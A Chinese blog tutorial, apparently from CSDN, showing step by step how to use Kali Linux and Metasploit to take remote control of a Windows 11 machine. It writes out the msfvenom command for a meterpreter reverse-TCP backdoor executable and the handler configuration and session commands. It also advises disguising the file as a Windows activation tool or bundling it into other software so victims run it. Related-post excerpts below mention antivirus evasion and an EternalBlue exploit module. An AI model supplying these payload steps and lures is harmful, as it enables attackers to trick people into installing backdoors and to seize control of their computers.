Kali Linux利用MSF渗透Windows11电脑

原创 已于 2023-03-02 12:20:24 修改 · 7.9k 阅读 · 136 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #服务器

于 2023-03-02 12:18:59 首次发布
本文介绍了如何使用KaliLinux和MSFvenom工具对Windows11系统进行渗透测试。首先需进入Kali的Root模式,然后生成可执行的后门文件,设置本地IP和端口。接着,在msfconsole中配置相应模块和参数,确保靶机运行生成的文件后,即可获得远程控制的shell。

目录

一、MSF简介

渗透环境

二、渗透流程

1.Kali Linux进入Root模式

 2.生成可执行文件

3.运行msfconsole命令

 4.配置参数

 5.在靶机Windows11打开可执行文件

6.渗透

一、MSF简介

Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。

渗透环境

使用Kali Linux进行演示操作

目标靶机:Windows11

软件:Msfvenom、Msfconsole(Kali Linux系统内置)

二、渗透流程

1.Kali Linux进入Root模式

不在Root模式下运行可能会出现操作者权限不够的提示,为了避免命令执行失败,第一步先将Kali进入Root管理员模式。执行命令之后输入Kali的密码时,密码是被隐藏的。

命令:sudo su

 2.生成可执行文件

命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe

<本地ip>写自己Kali Linux的IP地址,用ifconfig就能查看自己Kali的IP地址
<本地端口号>自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Windows11激活工具等可能更容易让目标主机上钩
当然MSF也可以用来渗透Android、Mac、CentOS等

 

这个就是Kali Linux主机的IP地址

 接下来运行命令来生成可执行文件

 把生成的可执行文件放入目标靶机Windows11中

3.运行msfconsole命令

命令:msfconsole

 4.配置参数

(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.88.134(填写自己主机的IP地址)
(4)命令: set lport 1234(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)

 5.在靶机Windows11打开可执行文件

在这里我们可以把文件稍微伪装一下,例如修改图标或者将其捆绑在某些软件中,当用户打开软件时会自动安装在其电脑上。

6.渗透

命令:sessions(查看上钩的目标靶机)

命令:sessions -i -1(选择要攻击的用户)

 

这个时候就已经拿到Windows11的shell啦^ ^

Kali | MSF入侵Windows11
BeacherHou的博客
07-13 7130
Kali | MSF入侵Windows11 制作免杀木马 ### 木马如何免杀 木马绕过免杀本质上还是更改他的特征码,那么总结一下可以有 编码 加壳免杀 二次编译 分离免杀:即将ShellCode和加载器分离 目前msfvenom的encoder特征基本都进入了杀软的漏洞库,很难实现单一encoder编码而绕过杀软,所以对shellcode进行进一步修改编译成了msf免杀的主流。互联网上有很多借助于C、C#、python等语言对shellcode进行二次编码从而达到免杀的效果。 木马如何制作 安装编译
【二进制安全】堆漏洞:Double Free原理
cc123489ll的博客
04-24 497
我们先不用管 修改已被释放的空闲块中的内容到底有什么用,我们现在只需要知道。
Kali Linux+Windows 11双系统物理实体机安装
热门推荐
m0_74075298的博客
04-29 1万+
Kali Linux2023.1和Windows11双系统安装
Windows 11高危漏洞:300毫秒即可提权至管理员
FreeBuf_的博客
04-17 941
该漏洞编号为 CVE-2025-24076,通过精密的 DLL 劫持技术利用 Windows 11“移动设备”功能的缺陷。Compass Security 公司的 John Ostrowski 表示:“这个漏洞是典型的 DLL 劫持场景,但包含极具挑战性的时间控制因素,攻击窗口期极短——仅有 300 毫秒,但我们开发了可靠的技术手段实现稳定利用。漏洞利用过程面临多项技术挑战。该漏洞利用案例表明,即使是现代操作系统,在新功能实现中也可能受到长期存在的攻击技术威胁,特别是当熟练的攻击者利用时间差和竞争条件时。
Kali利用msf入侵Windows电脑(最详细渗透流程、生成木马、监控屏幕)
最新发布
QIANDXX的博客
09-08 1026
演示环境。
kali系统入侵电脑windowswin11系统)渗透测试,骇入电脑教学
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 1万+
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕。
Kali MSF渗透Windows 11电脑
2303_77845131的博客
07-21 824
本次渗透均在靶机内实现。未经授权使用msfvenom攻击他人系统属于。请确保你是在下进行渗透测试。虚拟机:kali Linux靶机: Windows 11专业版。
kali linux渗透win11操作系统
2301_78519654的博客
12-27 1229
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP地址 LPORT=8888 -f exe -o win10.exe。第7步设置IP和端口号{端口号用你刚刚生成文件的那个端口号} {IP用你刚用ifconfig这个命令查出来的}我的是172.19.215.206。第3步在左边的终端输入以下命令并回车。第5步 在左边的输入一下命令并回车。第6步 在左边的输入一下命令并回车。第4步在左边的输入一下命令并回车。在右边的终端输入以下命令并回车。
超详细!!简单使用kaliMSF渗透Windows主机操作实战,真实有效
2401_83640658的博客
02-12 902
超详细!!简单使用kaliMSF渗透Windows主机操作实战,真实有效
kali利用msf渗透Windows电脑测试
2403_90011488的博客
03-28 1370
MSF集成了数千个已知的软件漏洞利用模块,支持针对不同平台(如WindowsLinux)和服务(如SMB)的漏洞攻击。例如,著名的永恒之蓝漏洞 (MS17_010)就是通过MSF进行利用的。
kali linux-msf-ssh爆破
10-13
### Kali Linux下的MSF与SSH爆破技巧详解 #### 一、背景介绍 随着网络安全威胁的日益增多,渗透测试成为保障系统安全的重要手段之一。Kali Linux是一款专门为渗透测试和安全审计设计的操作系统,内置了大量的安全...
轻松使用Kali LinuxMSF模拟安卓渗透(By:Kali与编程)
Kali与编程
09-15 542
通过Kali对安卓设备的渗透测试,我们可以发现手机中的安全隐患。这表明安卓安全至关重要,因为手机里有个人信息、照片等重要数据。加强安全措施,能防止数据泄露,保护隐私安全。定期更新系统和应用、安装安全软件、不随便点链接或下载未知来源的应用,都是必要的防护手段。lhost 表示:KALI监听主机。lport 表示:KALI监听端口。
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 2191
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
使用Kali Linux 侵入windows系统
liveJQ
03-13 8504
创建有效负载 要破解Windows,我们需要创建一个有效负载,作为我们进入该PC的后门。 比如有一位客户需要支付一笔费用委托货车司机运送一车石油,石油本身的重量、车子的 重量、司机的重量等等,这些都属于载重(load)。但是对于该客户来说,他关心的只有石 油的重量,所以石油的重量是有效载重(payload,也就是付费的重量)。 对于程序员来说就是在程序中 起关键作用的代码。 举一个最简单的例子,一...
kali入侵windows
weixin_34405557的博客
12-15 5126
因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门。 ####实验环境 ![实验环境.jpg](http://upload-images.jianshu.io/upload_images/4976516-daae4fea5636c8d4.jpg?imageMogr2/auto-orient/...
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 2436
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
kali metasploit 攻击 windows
weixin_42102555的博客
07-27 1108
这是一个简单的metasploit使用实例: 首先,我们要先准备一些东西: 1.kali 虚拟机 2.kali IP地址:192.168.222.128 (可使用ifconfig查询) 3.一个kali没有使用的端口:5555 4.一个可以与kali通信的靶机:windows 10 (ip未知) 首先,我们得准备一下我们的鱼饵:hacker.exe 我们先在kali里精心制作一下鱼饵!: #:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168
kali linux安装msf
weixin_45719968的博客
09-25 1644
kali linux安装 msf过程
Kali利用msf渗透Windows电脑(超详细)
jennycisp的博客
02-27 3297
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
kali渗透win11
02-16
### 如何使用 Kali LinuxWindows 11 进行渗透测试 #### 准备工作 为了成功地对 Windows 11 执行渗透测试,确保拥有合法授权是非常重要的。未经授权的渗透测试可能违反法律并造成损害。 安装最新版本的 Kali Linux 并更新所有软件包以获得最新的功能和修复的安全补丁[^1]。 ```bash sudo apt update && sudo apt upgrade -y ``` #### 收集信息 启动 Kali 后,首先需要收集有关目标系统的尽可能多的信息。这可以通过多种方式完成,比如通过 Nmap 工具扫描开放端口和服务: ```bash nmap -A <target_IP> ``` 此命令会返回操作系统指纹、服务版本和其他有用的数据,有助于规划后续步骤[^4]。 #### 枚举用户账户 接着可以尝试枚举远程主机上的有效用户名列表。对于 SMTP 服务器来说,`smtp-enum-users.nse` 脚本可以帮助识别有效的电子邮件地址对应的用户账号;而对于其他协议,则需选用相应的脚本来实现相同目的。 针对 Windows 系统还可以考虑利用 SMB 协议来进行进一步探索: ```bash smbclient -L //<target_IP> -N ``` 这条指令用来列出共享资源而无需提供凭证,在某些配置下可能会泄露敏感数据。 #### 利用 Metasploit 实施攻击 当已经掌握了足够的前期情报之后就可以着手准备实施具体的攻击行动了。Metasploit 是一款强大的框架,其中包含了大量预构建好的漏洞利用模块可以直接拿来即用。 假设已知存在某个特定版本 MSSQL 数据库中的 SQL 注入缺陷,那么可以在 msfconsole 中加载对应 exploit 模块并通过设置必要的参数选项来发起攻击尝试获取 shell 访问权限。 ```ruby use exploit/windows/mssql/ms17_010_eternalblue set RHOSTS <target_IP> exploit ``` 上述例子展示了如何运用永恒之蓝 (EternalBlue) 漏洞进行攻击操作,当然实际应用时应依据具体情况挑选合适的 payload 和方法[^3]。 #### 渗透后的清理工作 一旦完成了预定的任务就要记得清除任何留下的痕迹以免被发现。关闭不必要的连接通道、删除临时文件以及恢复初始状态都是必不可少的操作环节之一。 ---
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Xiao5ovo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值